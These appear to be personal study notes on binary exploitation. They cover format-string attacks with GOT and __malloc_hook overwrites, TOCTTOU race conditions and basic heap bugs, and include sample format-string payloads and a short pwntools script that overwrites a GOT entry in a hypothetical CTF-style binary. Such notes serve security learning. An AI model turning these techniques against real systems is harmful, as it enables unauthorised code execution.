You can use `%p` to see what's on the stack. If the format string itself is on the stack, then one can place an address (say _foo_) onto the stack, and then seek to it using the position specifier `n$` (for example, `AAAA %7$p` might return `AAAA 0x41414141`, if 7 is the position on the stack). We can then use this to build a **read-where** primitive, using the `%s` format specifier instead (for example, `AAAA %7$s` would return the value at the address 0x41414141, continuing the previous example). We can also use the `%n` format specifier to make it into a **write-what-where** primitive. Usually, we instead use `%hhn` (part of standard C99), which lets us write one byte at a time.

We use the above primitives to initially beat ASLR (if any) and then overwrite an entry in the GOT (say `exit()` or `fflush()` or ...) to raise it to an **arbitrary-eip-control** primitive, which basically gives us **arbitrary-code-execution**.

Possible difficulties (that make it "advanced" exploitation):

If we have **partial ASLR**, then we can still use format strings and beat it, but this becomes much harder if we only have a one-shot exploit (i.e., our exploit needs to run instantaneously, and the addresses are randomized on each run, say). The way we beat this is to use addresses that are already in memory, and overwrite them partially (since ASLR affects only higher-order bits). This way, we can gain reliability during execution.

If we have a **read-only GOT** section, then the "standard" attack of overwriting the GOT will not work. In this case, we look for alternative areas that can be overwritten (preferably function pointers). Some such areas are: `__malloc_hook` (see the `man` page for the same), `stdin`'s vtable pointer to `write` or `flush`, etc. In such a scenario, having access to the libc sources is extremely useful. As for overwriting `__malloc_hook`, it works even if the application doesn't call `malloc` directly: since it is calling `printf` (or similar), if we pass a width specifier greater than 64k (say `%70000c`), it will internally call malloc, and thus whatever address was specified at the global variable `__malloc_hook`.

If we have our format string **buffer not on the stack**, we can still gain a **write-what-where** primitive, though it is a little more complex. First off, we need to stop using the position specifiers `n$`, since if these are used, `printf` internally copies the stack (which we will be modifying as we go along). Now, we find two pointers that point _ahead_ into the stack itself, and use those to overwrite the lower-order bytes of two further _ahead_-pointing pointers on the stack, so that they now point to `x+0` and `x+2`, where `x` is some location further _ahead_ on the stack. Using these two overwrites, we are able to completely control the 4 bytes at `x`, and this becomes our **where** in the primitive. Now we just have to ignore more positions on the format string until we come to this point, and we have a **write-what-where** primitive.
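pwntools automates the `%hhn` byte-at-a-time arithmetic with its `fmtstr_payload` helper. A sketch, where the offset 7 and the `win` symbol are hypothetical:

```python
from pwn import *  # pwntools

elf = ELF("./challenge")   # hypothetical binary with a printf(buf) bug
io = process(elf.path)

# "AAAA %7$p" printing 0x41414141 told us our buffer is argument 7.
payload = fmtstr_payload(7, {elf.got["exit"]: elf.symbols["win"]})
io.sendline(payload)
io.interactive()
```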
### Race Conditions & Exploiting Them

Written on 1st April 2017

> Influenced by [this](https://www.youtube.com/watch?v=kqdod-ATGVI) amazing live stream by Gynvael Coldwind, where he explains race conditions

If a memory region (or file or any other resource) is accessed _twice_ with the assumption that it will remain the same, but due to switching of threads we are able to change its value in between, we have a race condition.

The most common kind is a TOCTTOU (time-of-check to time-of-use), where a variable (or file or any other resource) is first checked for some value, and if a certain condition for it passes, then it is used. In this case, we can attack it by continuously "spamming" this check in one thread, and in another thread continuously "flipping" it, so that due to randomness, we might be able to get a flip in the middle of the "window of opportunity", which is the (short) timeframe between the check and the use.

Usually the window of opportunity is very small. We can use multiple tricks to increase this window of opportunity by a factor of 3x or even up to ~100x. We do this by controlling how the value is cached or paged. If a value (let's say a `long int`) is not aligned to a cache line, then 2 cache lines might need to be accessed, and this causes a delay for the same instruction to execute. Alternatively, breaking alignment on a page (i.e., placing it across a page boundary) can cause a much larger access time. This might give us a higher chance of the race condition being triggered.

Smarter ways exist to improve this race condition situation (such as clearing the TLB, etc., but these might not even be necessary sometimes).

Race conditions can be used, in (possibly) their extreme case, to get ring0 code execution (which is "higher than root", since it is kernel-mode execution).

It is possible to find race conditions "automatically" by building tools/plugins on top of architecture emulators. For further details, see http://vexillium.org/pub/005.html

### Types of "basic" heap exploits

Written on 31st Mar 2017

> Influenced by [this](https://www.youtube.com/watch?v=OwQk9Ti4mg4jjj) amazing live stream by Gynvael Coldwind, where he is experimenting on the heap

Use-after-free:

Let us say we have a bunch of pointers to a place in the heap, and it is freed without making sure that all of those pointers are updated. This would leave a few dangling pointers into free'd space. This is usually exploitable by making another allocation, of a different type, into the same region, such that you control different areas, and then you can abuse this to gain (possibly) arbitrary code execution.

Double-free:

Free up a memory region, and then free it again. If you can do this, you can take control by controlling the internal structures used by malloc. This _can_ get complicated, compared to use-after-free, so prefer that one if possible.

Classic buffer overflow on the heap (heap overflow):

If you can write beyond the allocated memory, then you can start to write into malloc's internal structures of the next malloc'd block, and by controlling what internal values get overwritten, you can usually gain a write-what-where primitive, which can usually be abused to gain higher levels of access (usually arbitrary code execution, via the GOT/PLT, or `.fini_array`, or similar).
--------------------------------------------------------------------------------